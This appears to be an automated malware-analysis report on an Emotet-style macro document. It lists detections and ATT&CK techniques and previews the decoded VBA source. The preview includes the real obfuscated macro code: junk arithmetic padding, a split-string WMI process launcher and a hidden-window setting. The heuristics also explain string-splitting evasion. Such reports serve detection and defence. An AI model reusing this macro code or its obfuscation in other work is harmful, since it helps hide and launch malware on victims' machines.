MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of legacy WordBasic auto-exec macros and VBA macros, specifically triggering an AutoOpen macro. Critically, the macro uses GetObject and CreateObject to launch a WMI process, with obfuscated API names like 'winmgmts'. This strongly suggests a downloader functionality, consistent with the Emotet family, which often uses such techniques to fetch and execute further stages. The ClamAV detection also confirms this classification.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6861363-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59706 bytes |
SHA-256: d133fab4ac710a015d89bc6998ed80eab93a99d28ec91c254023b600c4388837 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "R9_45_7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "E031200_"
Function d1_407()
If p_1425 <> I88_9_8_ Then
v68_858 = (428620398)
C7_784 = m5190_4 * 118116226 + u_6_352 + CLng(v70_087_)
F659_137 = 309806566 / Hex(i6128__ / Chr(Z68772 - CDate(36979775)) * 579587310 / 389785967) / w864_8 - Fix(297566378)
B__43410 = (621256709)
End If
If r49280 <> j9___82_ Then
S7_1__ = (63787166)
E2772764 = S8_206_ * 54126198 + C_196_83 + CLng(t1___03)
N8456_86 = 343595708 / Hex(v04_922 / Chr(R_3759 - CDate(293058146)) * 641648967 / 20298651) / M0682_09 - Fix(631564489)
J_293__ = (330770041)
End If
If F1_692 <> R3309_7 Then
Z1__04 = (190120509)
k059684 = w_0998 * 278107319 + q6794_89 + CLng(Y7_07_6)
k_07707_ = 616089774 / Hex(R837683 / Chr(b1_700_ - CDate(259446265)) * 124792873 / 173956409) / r4__3_ - Fix(3957901)
B__04_44 = (289542732)
End If
If f_8265 <> J_434_7 Then
N6_2229 = (372889393)
G94__6__ = s8_3069 * 260236540 + n393__ + CLng(b__030)
u17_7190 = 714359534 / Hex(q7086_1 / Chr(A2____6_ - CDate(705864281)) * 146190079 / 385332804) / z88_9_ - Fix(737269858)
Y26_9_58 = (738950352)
End If
If S_890343 <> C__32_5 Then
a5_1271 = (748951573)
o1_4315 = j84_701 * 943459467 + i___3_08 + CLng(I962_56)
j2_208_5 = 352213361 / Hex(B7_177_ / Chr(S88777_3 - CDate(97952918)) * 229772506 / 178719200) / J99__364 - Fix(587436027)
Y60_60 = (270359717)
End If
If j_26866_ <> V49805 Then
p__618 = (632708159)
a_45349 = z3_8789 * 21463816 + j__025 + CLng(z4_9____)
t4_1526 = 857659617 / Hex(T7__18 / Chr(c23_569 - CDate(937503249)) * 718071240 / 351480477) / b8523420 - Fix(506511051)
N_9777 = (889171548)
End If
If l45_47_3 <> w84459 Then
u97_3_28 = (73691754)
N_9_17__ = O72__311 * 538318571 + B5_65_ + CLng(j_6_56)
m4_5_3 = 82260219 / Hex(U33_28 / Chr(h48_60 - CDate(733073375)) * 894118477 / 519535761) / t9_68_ - Fix(277961741)
c7_453_8 = (889786015)
End If
If D48_833 <> W4____80 Then
u726__1 = (886075633)
Z_798_0 = I2_8_0 * 36658993 + p__15__ + CLng(q9284946)
T6_2_6_8 = 154679561 / Hex(k_29200 / Chr(d_8___3 - CDate(636547383)) * 876471277 / 103535968) / C44____ - Fix(690577965)
j_92_1_ = (168679940)
End If
End Function
Function a50121_5(C__09_9, J39__4_3)
On Error Resume Next
If O8360_0 <> H8873986 Then
E0_120 = (707556898)
a_3_8594 = F2__8_2 * 769617898 + R_7__107 + CLng(l_7_3_)
B286012 = 168869300 / Hex(Q5__979_ / Chr(B792__9 - CDate(155950407)) * 650894411 / 104879468) / p8__5_16 - Fix(624729997)
s233_512 = (387004902)
End If
If i4__6_ <> J_21145 Then
J40131 = (915651260)
B_11_89 = n5_87_6 * 466173657 + j868_9_ + CLng(J74_8__0)
I96_99 = 642186469 / Hex(q_90058_ / Chr(O7_592 - CDate(127668919)) * 499843458 / 297040584) / d2_53_4 - Fix(785442303)
H41618_9 = (657836405)
End If
Set k307_293 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
If q5337354 <> J0_8_3 Then
W___075 = (41173870)
Q___67_1 = L_43320 * 91774371 + J18__8_ + CLng(l_737_3)
R6__0_7 = 606139366 / Hex(o8_4_90 / Chr(H1_0_6 - CDate(771700871)) * 517139692 / 792313149) / P1_4__05 - Fix(336567443)
G1322_9 = (609707731)
End If
If i07_45 <> N14277_ Then
i__3_198 = (391056265)
a08_7_95 = t740__85 * 805785355 + i1089_ + CLng(t3_4_28)
i0_04__ = 444575962 / Hex(L4149_9 / Chr(t5__109 - CDate(705396766)) * 20526299 / 241168612) / L639268 - Fix(339373884)
E3666__4 = (367230923)
End If
k307_293.ShowWindow = 127424 - 127424
If i1_62_ <> z_1__9 Then
M7927758 = (432711541)
h80___5_ = k348638_ * 293469487 + S_52409 + CLng(L_31385_)
i90_8559 = 84098378 / Hex(p2_2505_ / Chr(m_80_1 - CDate(175102189)) * 379666387 / 873539123) / f77_02__ - Fix(935295448)
s16_5__ = (821292268)
End If
If i79_36 <> p6150002 Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.